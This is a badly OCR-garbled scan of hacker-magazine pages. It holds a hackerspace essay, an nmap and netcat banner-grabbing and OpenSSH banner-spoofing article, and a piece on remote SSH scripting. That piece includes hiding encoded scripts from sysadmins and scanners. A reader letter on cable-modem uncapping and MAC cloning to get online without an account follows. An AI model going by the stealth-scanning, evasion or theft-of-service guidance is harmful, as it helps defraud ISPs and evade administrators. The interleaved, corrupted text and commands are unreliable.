after DefCon 1 5. The mi n ute I got back, I
cou nterparts around the wor l d, maki ng fri ends
started worki ng on maki ng Hackers on a Pl ane
and thi nk i ng of new i deas, comi ng together i n
happen.
exactl y the way I hoped they wou l d. I got to
We set out to make the u l t i mate hacker
see, fi rsthand, a commu n i ty formi ng a round
vacat i on. For $ 1 , 337 ( or 1 , 337 eu ros), you
an event I hel ped put together. The HOPE
got a t i cket t o DefCon, rou nd t r i p a i rfare from
conferences have al ways brought hackers
l.as Vegas to Germany, a t i cket, and a l l the
suppl i es you'd need at the camp. Aga i n, words
from a round the wor l d and hel ped strengthen
fai l me i n descr i bi ng how awesome the camp
the i nternat i onal hacker commu ni ty. The
was. I strongl y encourage you to check out
Hackerspace Vi l l age was merel y an extensi on
the docu mentary about the camp t o see for
of that, focused around hel pi ng hackers bui l d
yourspl f (chaosradi o. ccc. de/ctv l 1 3 . html ). permanent gather i ng poi nts where they l i ve,
Aga i n, in retrospect, putt i ng 40 h ung-over so they can enj oy somethi ng l i ke a year-round
hackers on a transconti nenta l fl i ght, t hen HOPE of thei r own.
dumpi ng them i n a fi el d wi t h few creature
I n many ways, a hacker's work i s never
comforts was not rea l l y a great i dea . Yes,
rea l l y fi n i shed. Maki ng spaces l i ke HacDC
the hacker camps i n E urope are exactl y that:
and NYCResi stor thr i ve takes a l ot of effort ~
camps. One of our fi rst l ogi sti cal fai l u res was
and conti nues to test the bureaucrati c ski l l s
not ra i s i ng a l l the tents we needed before
of the hackers who keep them goi ng. I ' m sad
n i ghtfa l l . Wh i l e (a l most) everyone who went
to say that between my day j ob, hel pi ng ru n
had a great ti me, and the camp organi zers di d
everyth l ng I n the r po er t ) h 'l p s o t d( n
HacDC, and travel i ng to conferences to hel p
. I V e u. u , . II g
the wor l d's two l argest hacker events i n the
i ns pi re more hackerspaces, there i sn't a l ot of
same week i s not somethi ng I 'd recommend
t i me for me t o get and stay i nvol ved i n "real
repeat i ng.
hacki ng, " l i ke Mi crocontrol l er Mondays.
Even after a l ong week of partyi ng wi th
As HacDC embarks on a project that
fel l ow hackers, a few brave sou l s deci ded to
partners communi ty organ i zati ons to hel p
conti nue on a week l ong tou r of hackerspaces bu i l d a real , comprehensi ve, and free wi rel ess
throughout Germany and Austr i a. Here, network in our nei ghborhood, I real i ze wi th
vi si t i ng the C-Base, the C4 i n Col ogne, the
both trepi dati on and grati tude that my greatest
Metal ab i n Vi enna, Das Labor, Entropi a, the
soci al and organ i zati onal hacks are yet to
Netzl aden and others, hackers were i nspi red
come. I rea l i ze that I have a l ot more mi stakes
by the same th i ngs I saw a few months earl i er.
to make and l essons to l ear n. Whi l e I may
Three hackers from New York Ci ty deci ded to
never see the day where the average person
form thei r own hacker space and started l ayi ng
the fou ndati on for what became NYCResi stor
equates the term hacker wi t h geni us, passi on,
(nycresi stor. com) ri ght i n the mai n space of
and creat i vi ty, I ' m hope that that I ' m pl ayi ng
the C4!
some sma l l part i n br i ngi ng thi s commun i ty
Thi s year, at The Last HOPE conference,
cl oser together for the benefi t of manki nd.
many of these
hackerspaces come out for the
I
f you're interested i n building a hacker-
fi rst u. S. HackerspaceVi l i age. I ' m happy to say
space, be sure to check out hackerspaces. org.
it was a compl ete success, as that fi rst group
Nick is more than happy t o take your e-mails
of i nspi red Ameri can hackers got to i ntroduce at nickfarr@hacdc. org
l[
C 2d
2%
[
ZnC
r [
l
f
by mOuntai nrebel
mOuntai nrebel @ri seup. net
When tryi ng to ga i n access to a computer
through non-tradi t i on a l means, one of t he
fi rst t hi ngs you do i s a port scan. You want t o
fi nd out what ports a re open, what softwa re
i s r un n i ng on those ports, and, if possi bl e,
t he vers i on of t hat software. Then, you can
see i f there a re any known v u l nera bi l i t i es for
you to expl oi t . I n ma ny cases, you can use
banner grabbi n g to deter mi ne whi ch soft
ware is r un n i ng a nd i t s vers i on. After you
connect to an open port, i t 's often pol i te for
t he servi ce to send you a wel come banner
conta i n i ng i nfor mat i on about i t . Th i s a rt i cl e
i s about how t o spoof t he wel come banner
i n open source servers, us i ng OpenSSH as
an exa mpl e, to t ri ck or otherwi se t hrow off
potent i a l attackers.
The most popu l ar port scan ner today i s
n ma p, wh i ch you can get at i nsecure . org. I t
has a pl et hora of feat u res, and i f you're not
a l ready fami l i a r wi t h i t I s uggest you read up
on i t. A typi cal nmap scan l ooks l i ke t h i s:
root @ s i r i us : - # nmap 1 9 2 . 1 6 8 . 1 . 1 0
S tarti ng Nmap 4 . 6 0 ( ht tp : / / nmap . org )
at 2 0 0 8 - 0 4 - 2 6 2 0 : 4 5 EDT
Interes t i ng port s on 1 9 2 . 1 6 8 . 1 . 1 0 :
Not shown : 1 7 1 1 cl os ed por t s
PORT STATE SERVICE
2 2 / tcp
B O / tep
open 8 sh
open ht tp
3 1 2 8 / tcp open squi d- ht tp
5 9 0 0 / tcp open vne
Nmap done : 1 I P addres s ( 1 hos t up )
scanned in 0 . 1 3 9 seconds
Nmap can a l so do versi on detect i on and
OS f i ngerpr i nt i ng, t hough I wou l d avoi d
u s i ng these feat ures u n l ess you 're out of other
opti ons. They aren't very steal thy. OS f i nger
pr i nt i ng has been known to crash servers
before, and i t's not a l ways accu rate. Here's
what the same scan l ooks l i ke wi t h vers i on
detect i on enabl ed:
root @ s i y i us : - # nmap sV 1 9 2 . 1 6 8 . 1 . 1 0
St ar t i ng Nmap 4 . 6 0 ( h t tp : / / nmap . org )
a L 2 0 0 8 - 0 4 - 2 6 2 0 : 4 6 EDT
I nt er e s t ing port s on 1 9 2 . 1 6 8 . 1 . 1 0 :
Not shown : 1 7 1 1 c l osed por t s
PORT STATE SEHV lCE VElS [ ON
2 2 / t cp open 8 s h OpenSSH
4 . J p1 Debi an 8 ubunt u! ( protoco l 7 . 0 )
8 0 / tcp open h t tp Apache
ht tpcl 2 . 2 . 8 ( (I lbunt u ) PHP / ' . 2 . 4 -
.. 2ubunt ur wi t h Suho s i n - Pa t c h )
3 1 2 8 / tcp open h t tp proxy
cqu i d webproxy 3 . 0 . STABLE l
5 9 0 0 / tep open vne VNC
( protocol . 7 )
Nmap done : 1 l P addces s ( 1 h o s l up )
s canned i n 1 1 . 1 9 4 sccorl ds
I t mi ght be tempt i ng to a l ways do vers i on
detect i on, or even OS detect i on, wi t h you r
n ma p scans because t he res u l ts ma y conta i n
a l ot o f j u i cy i nformat i on. Bu t i f t he goal i s
stea l t h, i t 's best to ma ke as l i tt l e u nnecessary
traffi c on you r vi ct i m's network as poss i bl e.
I nstead, I wou l d s uggest us i ng t he TCP
SYN scan, whi ch i s t he defa u l t scan t ype i f
you're r u n n i ng a s root, wi t h no other speci a l
feat u res. You ma y want t o s l ow down t he
scan to ma ke i t l ess l i kel y t hat an i nt rus i on
detect i on system wi l l noti ce you. Once you
k now what you're dea l i ng wi th, you can try
fi gur i ng out t he server software and vers i on
one at a t i me. There's no need to do a vers i on
scan on t he http-proxy port i f you don't
i ntend to attack i t, r i ght ?
How does banner grabbi ng wor k? Servers
l i sten on TCP ports, and some servi ces send
out a wel come banner as soon as a connec
ti on i s made to these ports. To do a ma n u a l
banner grab, you j u st need t o connect to
you r target server on a speci fi c port us i ng a
program l i ke tel net or netcat. Then, you can
see what i t says. Thi s certai n l y doesn' t a l ways
work, but i t works a l ot of t he t i me. Here
a re exampl e banner grabs for t he servi ces
above:
ulumn 2d-
---------l
[
C 2V
roo t @ s i r i us : - # nc 1 9 2 . 1 6 8 . 1 . 1 0 2 2
S S H- 2 . 0 - 0penSSH_4 . 7pl Debi an- 8 ubunt ul
roo t @ s i r i us : - # nc 1 9 2 . 1 6 8 . 1 . 1 0 8 0
roo t @ s i r i us : - # nc 1 9 2 . 1 6 8 . 1 . 1 0 3 1 2 8
roo t @ s i r i u s : - # n c 1 9 2 . 1 6 8 . 1 . 1 0 5 9 0 0
RFB 0 0 3 . 0 0 7
As you c a n see, the servi ces on port 80
and 3 1 28 don't di s pl ay wel come banners.
Port 5900 does, but i n order to fi gure out
what i t means, you 'd probabl y h ave to
googl e for i t . I n t hose cases, I th i n k i t wou l d
be safe t o j ust u se nmap's vers i on detect i on.
Here's how you wou l d onl y scan ports 80
and 3 1 2 8, wi t h vers i on detect i on :
roo t @ s i ri us : - # nmap - sV - p8 0 , 3 1 2 8
" 1 9 2 . 1 6 8 . 1 . 1 0
For t hi s a rt i c l e, we' l l h i de t he banner for
t he OpenSSH server, maki ng it much harder
to attack t hat port. As l ong as you're reason
abl y comfortabl e wi t h t he syntax of t he
progra mmi ng l a nguage that t he ser ver was
programmed i n , you can do t hi s on you r
own wi t h a n y other open source server.
If you're a l ready r u n n i ng a n SSH server,
u n i nsta l l i t . Go to opens s h. org a nd down
l oad sou rce code for t he l atest vers i on of
OpenSSH. Extract t he code, a nd edi t t he fi l e
ss hd . . Th i s i s t he C fi l e for t he SSH deamon.
I f you're tryi ng t h i s wi t h s ome other server,
it mi ght t ake a l i ttl e bi t of fi gu r i ng out t he
program f l ow before you fi nd exact l y where
t he banner gets di s pl ayed i n t he code. I n
OpenSSH, i t's i n t he fu nct i on s shd_exchange_
"i dent 1 DC L 1 Cl l . Sea rch for t he l i ne t hat
l ooks l i ke t hi s:
snpri nt f l bu f , s i. z eof buf , " SS H- % d . %d
"% . 1 0 0 s \ n " , ma j o r , mi nor , SSH_VERSION
. ) ;
Th i s i s t he l i ne whi ch pr i nts a ba nner that
l ooks s i mi l a r to
"
SSH- 2 . 0 OpenS.S H_4 . 7 pl
Debian- Subunt u l . The fi rst part,
"
SSH - % d . %d- , "
i s necessary for SSH c l i ents to know what
vers i on of t he SSH protocol they' re dea l i ng
wi t h, a nd they won' t be abl e t o connect i f
t hat i s n't i ntact. The next part di s pl ays t he
val ue of t he const ant SSH_VERSI ON, whi ch i s
defi ned i n vers i on . . Here's what I changed
that l i ne of code to:
snp c i n t f l bu f , 1 . tO! but , " SS H- % d. %d
"MES S W I TH THE BEST , DI E L I KE THE
. REST \ n " , ma j o r , mi nor ) ;
That's i t . Save t he fi l e, and compi l e and
i nsta l l OpenSSH. There a re deta i l ed i nst r uc
t i ons i n t he fi I e I NSTALL, but, i n short, you need
to ma ke s ure you have t he zl i b and OpenSSL
devel opment l i brar i es i nsta l l ed; t hen,
you type . / confgure, t hen make, t hen
make i ns ta l l.
Now t hat I ' m r u n n i ng my newl y compi l ed
OpenSSH server, here's what t he banner gr ab
l ooks l i ke:
root @ s i r i us : - # nc 1 9 2 . 1 6 8 . 1 . 1 0 2 2
S S H- 2 . 0 - MESS WITH THE BEST , D I E LI KE
. THE REST
And here's what t he nma p vers i on detec
t i on scan l ooks l i ke:
root @ s i r i us : - # nmap - sV -p22
. 1 9 2 . 1 6 S . 1 . 1 0
Starti ng Nmap 4 . 6 0 ( http : / / nmap . org
. at 2 0 0 S - 0 4 - 2 6 2 1 : 0 0 EDT
I nteres ti ng ports on 1 9 2 . 1 6 S . 1 . 1 0 :
PORT STATE SERVICE VERS I ON
2 2 / tcp open s s h ( protocol 2 . 0 )
1 s e rvi ce unre cogn i zed de spite
. returning data . I f you know the
s e rvi ce/ ve r s i o n , please s ubmi t the
- fol l owing fingerprint at http : / / www .
. i nsecure . org/ cgi -bi n / s e rvi cefp-
. s ubmi t . cgi :
SF-Port 5 2 1 S 6-TCP : V4 . 6 0 % I 7 % D=4 / 2
-6 % T ime4 S 1 3 D 0 5 0 % PxS 6 6 4 -unknown-
-l i nux-gnu % r I NULL , 2 E , H S SH-2 \ . O -
"MES S \ x2 0 WI TH\ x2 0THE \ x2 0BES T , \
"x2 0 D I E \ x 2 0 L I KE \ x 2 0 THE\ x2
"S F : OREST \ n H ) ;
Servi c e detec t i on perf ormed . P l eas e
.. report any i ncorrec t resu l t s
. a t h t tp : / / nmap . org/ submi t / .
Nmap done : 1 I P address 1 hos t up )
-scanned i n 6 . 0 8 7 seconds
Edi t i ng other peopl e's software l i ke th i s
rea l l y i s n't as i nt i mi dat i ng as i t mi ght seem,
provi ded t hat you u nderstand s ome of t he
l a nguage i t's programmed i n . Wi t hout too
much troubl e, you cou l d even edi t the server
so that i t doesn 't send t he SSH protocol
vers i on and edi t t he c l i ent so i t doesn't
requ i re a protocol vers i on to be sent. Th i s
way, attackers won' t even know t hat they're
dea l i ng wi t h an SSH server, and you' l l onl y
be abl e t o connect t o i t wi th you r spec i a l
c l i ent. The poss i bi l i t i es of bu l l etproof secu
r i ty wi t h j ust l i tt l e bi t of code hacki ng a re
endl ess .
l
[
C J-2 %a
[
aZnC
by Atom Smasher
atom@smasher.org
pgp 762A 3B98 A3C3 96C9 C6B7
582A B88D 52E4 D9F5 7808
Don' t t r ust anyone who smokes mar i juana
and votes for Bush. I ' ve had friends who have
smoked pl enty of pot, and I ' ve known a few
peopl e who voted for Bush that I can get a l ong
with, but anyone who does both is bad news.
Stay away.
Before I go i nto too much detai l , there are
fou r things that we shou l d be fami l iar with. I f
you ' ve been usi ng *ni x for any l ength of time,
then you may a l ready be fami l i ar with them.
Al one, they a l l ow for some neat t r i cks, but
together they can be used for a di fferent ki nd
of remote scr i pting.
I hi ghl y recommend that these techni ques
be used wi th ssh publ i c key authent i cat i on. I f
you want to use a cron job, then i t ' s a neces
si ty. Do a web-search if you ' re not famil i ar
with this; there are a l ot of tutorial s on the
web, so I won' t go i nto deta i l here. I wil l poi nt
out that publ i c key authenticat i on i s not onl y
more conveni ent th;m typing a passphrCse but
al so more secu re agai nst certa i n attacks.
I n the fol l owi ng exampl es, the assu mption
is that you ' re l ogged into a box r unni ng *nix
and that you have ssh access to a second box
a l so runni ng *ni x. For those on a ti ght budget
or otherwi se restri cted in access to resou rces,
you can pl ay a l ong wi th two dumpstered
computers or two Windoze boxes after hours,
some Ubuntu CDs, and a switch, router or
hub. In a pinch, a crossover ethernet cabl e
can do the job.
susp i c ous . org upt i me
' : 5 1pm up / daye 1 1 : 2 9 , usc r s ,
l oad average : J . U U , J . J J , J . J J
To quote from the ssh manual , "I f [ al
command is specifi ed, i t is executed on the
remote host i nstead of a l ogin shel l . " That ' s a
neat trick. The exampl e above shows a si mpl e
command wi thout options or arguments, but
with proper quot i ng this can al so be used for
compl ex commands incl uding pi pel ines, l i sts,
control operators, and scr i pts.
Tri ck 2: Command i nterpreters (shel l s)
can read commands from standard i nput.
% cctl O upL i me sh
9 : I PM up Z : J c , J U : e c, , -l oad
averages : U . U D , 0 . 1 2 , J . J c
We can pi pe thi ngs i nto , , and they wi l l
be executed by the shel l . You don' t thi nk thCt ' s
exci t i ng? OK, maybe i t isn' t, i n that exampl e.
I nstead of sh, we can al so use other shel l s
(bach, " "h, |l) and appl i cations that can
be used as command i nterpreters (11 , l,
[ |lCl, etc. ) . I n the fol l owi ng fou r exampl es,
we can use a command l i ne i nterface to pi pe
si mpl e commands into different appl i cations'
standard i nput. The output of a l l fou r of these
exampl es is "Hel l o Worl d. "
% echo ' put : " He l -l o wor l d . ' " ruby
% echo
t
prl_ nt
i t
Hel l O WCH' 1 . ' " I pyL hon
% echo ' pri nt " Ie l l o
llo c J ci . \ n " ; ' perl
% ectl o cctl o ( " Hc l l u Wor- l d . \ n " ) ;
php
Whi l e the rest of the exampl es a l l use the
Bourne shel l , the above exampl es demon
strate that you can use these techniques wi th
just about any i nterpreted l anguage.
Trick 3: SSH can pass data through
Trick 1 : SSH can
standard i nput, output and error.
execute remote commands.
ccho upL uC 1 . Lome , '1 i c i
On my l aptop I can execute the j l !0
. Oyq :;h
command and see output l ike this:
' : ' l pm . days 1 : . , / U` 1'` ,
up i Tc
. -j CFlcl ive raCf : J . J J , J . J U , J . J J
' : ` 4 lM . . : J / , U r, 1 .J What ' s actua l l y happening there is the
dveraqE ; : J . J c , J . ' , J . J
l oca l machine is echoing !0 into a pi pe,
But what if I want to quickl y run j l 0
the pi pe is passing it to the standard input
on a remote server? Of cou rse, I cou l d l og i n
of the command, which passes it to |
vi a SSH and type upt me. Another way to do
( again, on standard input) on the remote
this is to specify uptime as an argument to ssh:
machine where it is executed by "h, and then
ulumn 2d-
---------la
[
C J -
the standard output is di spl ayed l oca l l y. Actu
a l l y, i f we' re pi pi ng i nto ssh we don ' t have to
speci fy the sh as a command; if we l eft it out,
the i nput wou l d be executed by the defaul t
l ogi n shel l . There are two reasons I i ncl ude the
sh expl i ci tl y: because i t' s unambi guous and
because I tend to wri te scri pts that are speci fi c
to di fferent shel l s, so i t's good to speci fy whi ch
shel l t o use.
% ssh a tom@suspi c i ous . org ' echofoobar '
. I rot 1 3 sbbone
I n the a bove exampl e, the remote machi ne
echoes "foobar" to standard output. That output
comes to the l ocal machi ne, where i t's pi ped
through rot 1 3 . What I see on my consol e i s
the remote machi ne' s output, "foobar", after i t
i s rot1 3-encoded on the l oca l machi ne.
ssh atom@suspi c ious . org
. ' echo foobar ] >&2 ' I rot 1 3
ICCLt
I n thi s exampl e, the remote machi ne echoes
"foobar" to standard error. Al though the output
i s sti l l bei ng pi ped i nto rot l 3 , the output i s not
encoded because rot1 3 onl y encodes stan
dard output from t he s s h command; t he ssh
command here outputs "foobar" on standard
error, so it is not encoded. Standard output and
standard error can be treated i ndependentl y
on one mach i ne, even when the command i s
executed on another machi ne.
Trick 4: SSH wi l l return with the exit
status of the l ast command i t executes.
% ssh a tom@ suspi c ious . org ' l s foobar '
I s : cannot access foobar : No such fl e
. or di rec tory
% echo $ ?
2
Ass umi ng that there i s n' t a fi l e i n my
home di rectory on the remote mach i ne cal l ed
[ oobar, the I s command wi l l exi t wi th a
nonzero return code, and ssh wi l l return that
status to me, l oca l l y.
Note that the command argument to
ssh is i n s i ngl e quotes. Thi s exampl e wou l d
work wi thout quotes, bu t i t's good prac
ti ce to use quotes. For a nythi ng beyond
s i mpl e commands, i t becomes necessary to
use quotes. I t ' s al so worth not i ng that t hi s
command' s out put i s sent t o standard error;
ssh then passes i t to standard error on my
termi nal , where i t can be handl ed di fferentl y
t han standard output.
base-dri ven real estate web si tes. The code I
i nheri ted made crap l ook good. The onl y thi ng
worse t han the code I i nheri ted was the data
dumps that were suppl i ed every n i ght and
needed t o be converted i nto val i d SQL.
The scri pt t hat I i nheri ted to do thi s conver
si on was 1 500 l i nes of u ncommented perl
whi ch needed regu l ar mai ntenance. I t typi
cal l y took hal f an hour for the scri pt t o parse
the data dump before i t deci ded whether to
functi on correctl y, crash, or fi l l the SQL data
base wi th garbage. The fi rst thi ng I di d on
that j ob was to re-wri te i t as a 1 5 l i ne shel l
scri pt ( not cou nt i ng comments) that ran i n two
mi nutes and never needed tu ni ng.
The data dump usu a l l y came between
mi dni ght and 6am. Runni ng the scri pt from a
cron j ob, I had to add a few t hi ngs to make
sure the dump was compl ete before pars i ng i t;
I a l so added a few other san i ty checks. I n thi s
case, i t was better t o have a day-ol d database
than a broken database. So, by the ti me i t was
run n i ng on auto- pi l ot, I had the scri pts doi ng
sani ty checks; i f everythi ng checked out, t hen
the scri pts wou l d read the dat a dump and
convert i t i nto SQL. The SQL was was san i ty
checked and then i mported i nto the database.
My code was ru n n i ng perfect l y, I was
maki ng a few bucks, and I was copi ng reason
abl y wel l wi th former Mari nes who, i nstead of
focus i ng on ru nni ng the busi ness and keepi ng
thei r cl i ents happy, kept gett i ng a l l fi red up
about al l of t he great th i ngs Bush i s doi ng,
pausi ng onl y to announce the t i me every
afternoon at 4: 20. Predi ctabl y, the busi ness
rel ati onsh i p turned ugl y; i t was ti me for me to
l eave and take my code, but I had obl i gati ons
to keep them up and r unni ng.
Putti ng I t All Together
needed to get the scri pts off of thei r
servers, but I needed t hem t o r un every
ni ght. Wel come to a di fferent k i nd of remote
scri pti ng! Let's combi ne a few of the tri cks
above to create a si mpl e exampl e of usi ng ssh
to execute scri pts remotel y:
% cat t es t - scri pt
# ! / bi n/ sh
# # cat my pl an and pipe i t i nt o rot 1 3
c a t - I . plan ' r ot 1 3
Now, l et's r un that si mpl e scri pt on a
remote machi ne:
ssh atom@smasher . org sh * tes t - script
Pbzcyrgr , gbgny, hapbzcebzvfrq tybony
Pot Smoki ng Bush Voters . qbzvangvba .
wound up i n a bad busi ness deal wi th Note that the " /' character is j ust another
some pot-smoki ng Bus h voters. Here' s the way for the ssh command to read standard
short versi on: I was contractua l l y obl i gated to i nput from a fi l e.
r un code on thei r server, but I di dn't want them A reasonabl y compl i cated exampl e wou l d
to have t h e code. I was ori gi na l l y contracted be the database scri pts I was run n i ng for my
to bui l d and fi x back-end code for some data- pol i t i cal l y chal l enged associ ates. When the
`
l[
C J2
2%
[
ZnC
database scr i pts were r un di rect l y on t hei r
server, i t l ooked l i ke t hi s:
scri ptl I sc r ipt 2 && s cri pt3
After del et i ng t he scr i pts from t hei r server
and run n i ng them from my desktop, i t l ooked
l i ke t hi s:
ssh user@morons . exampl e sh * scri pt l
. ' scri pt 2 s s h user@morons . exampl e
. sh * scri pt 3
Wi t h onl y sl i ght modi fi cat i ons t o my code,
I was abl e to run the scr i pts from a cron job
on my desktop and have it do what it needed
to do on the remote server The roach-toki ng
Republ i cans di dn't have a copy of i t. The scr i pt
that di d most of the rea l work
(
scri pt 2 ) di dn' t
even r un on thei r server.
The fi rst scr i pt
(
s cri pt l
)
di d the i n i t i al
san i ty checki ng of t he data dump and pri nted
the dump to standard out. The second scri pt
(
scri pt2
)
read the dump from standard i nput
and di d most of the rea l work, spi nni ng data
dump straw i nto SQL gol d. The output from
scri pt 2 was SQL, whi ch i t output to a bunch
of temporary fi l es whi ch were t hen read by
s cript3 . Th i s scri pt t hen di d some fi nal sani ty
checks and wrote t he data i nto a new t abl e.
I t then renamed the tabl e, so there was no
downti me dur i ng updates. The onl y t hi ng I had
to change was s c r ipt 2 ; i nstead of just wri ti ng
the temporary fi l es l oca l l y, i t had to wri te the
temp fi l es to the server, so they cou l d be read
by s cri pt 3 when i t was run on the server.
OK, some of you may be wonderi ng,
"Hey, wa i t a mi n ute. Was n' t the code on thei r
server before you del eted i t? Di dn' t they have
backups?" They wou l d have had backups if
they put down the bong l ong enough to l i sten
to any of my suggest i ons. No, they di dn' t have
backups.
As much as I wanted t o take an acti ve part
i n screwi ng them, I knew they' d screw them
sel ves and save me the troubl e. Runn i ng the
cron job from my desktop worked fi ne for
about two months wi th no compl ai nts from
anyone. Then I got messages from the cron job
that it cou l dn' t connect to the server. After a
few mi nutes of i nvest i gati on I fou nd that they
chased away the l ast of thei r real estate cl i ents
and took the server off- l i ne. Not onl y di d they
screw themsel ves, but they di d i t ri ght on
schedu l e.
Securi ty Consi derations &
Other Appl i cations
over ssh, but I ' l l l eave that for someone el se to
demonstrate. I n the exampl e above, I was abl e
t o do t he data processi ng on my desktop; even
i f the Buds For Bus h i ntercepted the fi rst and
l ast scr i pt i n t he pi pel i ne, they sti l l wou l dn't
have had t he scr i pt that does the real work.
These techni ques can a l so be used to h i de
scr i pts on servers that scan for executabl e
fi l es. Not onl y can t he scr i pt be ru n remotel y,
but a copy of t he scri pt saved on the remote
mach i ne does n' t need to be executabl e to be
pi ped i nto a shel l and executed. The scr i pt al so
does n' t need to start wi t h hash- bang s i nce i t's
not bei ng i nvoked di rect l y and does n' t need to
provi de the fu l l path of the i nterpreter. I f that's
not enough to keep your sysadmi n frustrated,
you can a l so save an encoded copy of the
scr i pt, and pi pe i t through a decoder before
pi pi ng i t i nto an i nterpreter.
If you do happen to be a sysadmi n, thi n k
about u s i n g t h i s techni que to r u n a scr i pt
on mu l t i pl e servers. I nstead l oggi ng i n to
twenty or th i rty servers to do someth i ng
"qu i ck and s i mpl e, " you can ru n a for l oop
on you r desktop to run the scr i pt on each of
the servers wh i l e you s urf the web. Even for
somet hi ng that you norma l l y wou l dn' t scr i pt,
th i s becomes a more appea l i ng opt i on as the
number of boxes i ncreases. Someth i ng as
s i mpl e as edi ti ng a confi gurati on fi l e on a few
servers l ooks di fferent when you th i nk about
i t thi s way.
I ' l l l eave you wi th a real -wor l d exampl e
that I use regu l ar l y. I t' s a scr i pt to bl ock
advert i s i ng s i tes us i ng some of the t hi rd-party
operat i ng systems on a L i nksys WRT-S4G.
I ' m cu rrently us i ng it wi th DD-WRT, and i t ' s
great for bl ocki ng banner ads on al l computers
connected to my home LAN. I ca l l the
scr i pt adbl oc k- wr t 5 4g, and i t' s run wi t h no
arguments from my l aptop or desktop. Th i s
makes i t easy t o update t he l i st and i nstant l y
protect al l of the computers on my LAN. The
scr i pt that's executed on the router i s a s i ngl e
quoted argument to ssh; the l i st that i t ' s us i ng
is pi ped to ssh ' s standard i nput. The router
supports publ i c key a uthent i cat i on, so I don ' t
have t o type a passphrase when I r un i t .
I hope t hat you ' ve l earned somethi ng
usefu l , and that you can go beyond my
exampl es to create somethi ng usefu l . Happy
hacki ng!
Thi s techni que i s usefu l for run n i ng a scr i pt
on a machi ne and maki ng it di ffi cul t to see the
The scripts mentioned in this article
code, but it i s not a super-secure way to keep
can be downloaded from the
you r code from bei ng seen. I t wou l d be rel a-
2600 Code Repository at
t i vel y easy for a nyone wi th root access on the
http://www.2600.com!code/
remote mach i ne to capt ure the scr i pt bei ng ru n
ulumn 2d l[C JJ
.
hacked fi rmware
l i ke to express to 2600 my grati tude
than anyth i ng el se.
for
I hei r hard wor k i n gelli ng l
ogether al l of t he most
Confi gs someti mes can be modi fi ed t o where
i nterest i ng theori es and stori es out there i n the hacki ng
there's no l i mi t on the speed for the modem t o use,
f i el d al l i nto one quarterl y i ssue. Yeah, pl ease keep t he
but that commonl y doesn't work t hese days si nce the
stapl es . . . i t's much better ! I ' m so l ooki ng forward to
MD5 i s broken once you've edi ted i t by putti ng i n the
gett i ng my hands on a copy of that Best oi 2600 book!
speeds you want . I t doesn't mat ch the actual MDS
I 've al ways been i nto hacki ng anyth i ng wi th a Tsap i n
from the conf i g fi l e t hat came off the I SP's TFTP server.
it. There are TSOPs in vi rtual l y every devi ce that oper-
Yet there's sti l l offi ci al u nl i mi ted confi gs avai l abl e on
ates such as DI SH Network recei vErs, FTA rEcei vers,
most I SPs - you j ust need to scan and catch them i n
modems, vi deo game consol es, and even casi no sl ot
usc. Most of the t i me, network engi neers and admi ns
machi nes whi ch has l ed me t o the newfound i nterest
are the ones who use these confi gs when they're
in hardware l evel programmi ng and engi neer i ng
worki ng on th" n"twork.
of an " al l - i n-one" tool to make i t easy to modi fy a
In most areas, in order to get onl i ne wi th a hacked
TSOP on any devi ce bank vi a USB ser i al or USBJTAG
set up on Road Runner, you need to be abl e to SNMP
i nterfaces.
scan. However, you need the ri ght set of commu-
Anyway, I wanted t o gi ve the 2600 crowd a l i ttl e
ni ty str i ngs to re,p resu l ts out of that HFC network
more i nsi ght on cabl e I Sf provi ders. Readi ng t he
you're abl e to access. Those commun i ty stri ngs can
"Fxpl or i ng Road Runner's I nterna l Network" arti cl e i n
someti mes be tri cky t o get. However, one sure way
the 2 C: 2 i ssue made me wonder what was wrong wi th
of gCtt i ng thC str i ng i s by havi ng shel l or seri a l access
that ki nd of set up. Of course, i t l ooks l i ke i t's pretty
to the modfm wher< you can l og/moni tor the events
i nsecure but as a matter of fact, i t's pretty much how
the modem i s goi ng t hrough to get onl i ne. I t' l l read
; 1 1 cabl e l SI's do i t. Of course, some of them miy be
out the confi g as i t gets onl i ne. Then you can take
rea l l y i nsecure as heck, such as Comcast and CharlCr
these stri ngs and do a fu l l scan on your HFC range.
whi ch I know for a lact are the easi est l SIs to get
Do i t a few ranges away from yours though because
onl i ne' wi th wi thout even havi ng an account wi th
you cannot use a MAC from the same node or you ' l l
them. Cabl e I SPs have bpen abused for years a n d i t's
have col l i si ons, j ust as if you j uped a ni ck on I Re.
gEtt i ng worse wi th every ypar that gops by.
That rai ses a fl ag at the CMTS whi ch wi l l then s hut
Road Runner is actual l y onc of the l SIs that
down and rd,oot both modems constant l y unt i l one
requi res a bi t more work than usual to get onl i ne wi th
stays offl i ne.
a hacked set up. By hacked setup, I mean a modded
Some areas wi l l have SNMP di sabl ed or more
modem where you've fl ashed the TSOf wi th a custom
stri ct securi ty setti ngs that need to be enabl ed l i ke
fi rmware O "al ready" hacked fi rmware, Haxorware
BPI /Brl + whi ch doesn't work on some fi rmwares
bei ng one of the l atest "more featured" fi rmware
when the MAC has been changed from the or i gi nal
out t here for Broadcom 3349 based modems. From
one si nce the manufacturer certs embedded i nto the
sbhacker. net (whi ch i s a research group that does not
fl ash don't match up wi th the new MAC. Yet the fi rm-
condone t hPit of sprvi ce so don' t go there l ooki ng for
ware dcvei opi ng underground scene for these hacked
hel p on doi ng t hi s) you wi l l be poi nted i n the ri ght
moders i s growi ng i ncreasi ngl y at a fast successfu l
di recti on to get your own modem set up in order to
rate t hese days, managi ng to stay a step ahead of I SP
have more control over i t. Premods can be bought
cabl e provi der compani es, even t hough i f they don't
there too, but that takes the fun out of i t.
manage to stay a step ahead there are sti l l ways to
Some modems may be abl e to be hacked wi thout
get past thei r secur i ty by doi ng a total fu l l Tsap fl ash
any hardware modi fi cati ons at a l l . Wi th a VxWorks/
dump off a devi ce about one mi l e away from your
li t Fi l e method, you can pi au' t he modem i nto factory
area that is a l ready provi si oned and al l owed onto the
mode and then change certai n t hi ngs on i t and get
network. I t' l l work in most cases as l ong as i t's the
onl i ne usi ng these sett i ngs. But thi s way i s more r i sky
S,l me Broadcom revi si on as the othCr modem i s. You
si nce Ilw I SP has more control over your modem can al so j ust do a fu l l SNMP scan/dump of a cmcert
than you do at t hi s poi nt. They can send i t SNMI off t he devi ce you're cl oni ng t he MAC from and t hen
quer i es (wh i ch you can di sabl e) and set your modem i nj ect that i nto your modem, but you'd need the ri ght
to i gnore or change the SNMr ports to anyth i ng but sll s of the commun ity stri ngs to do that wi t h. Net-
the dCfaul t SNMP port. Al so, i t i sn't recommendpd if SNMP is one of the best SNMP scanner apps you can
you're l ooki ng for a stabl e "al ways on" connpeti on use out therl,
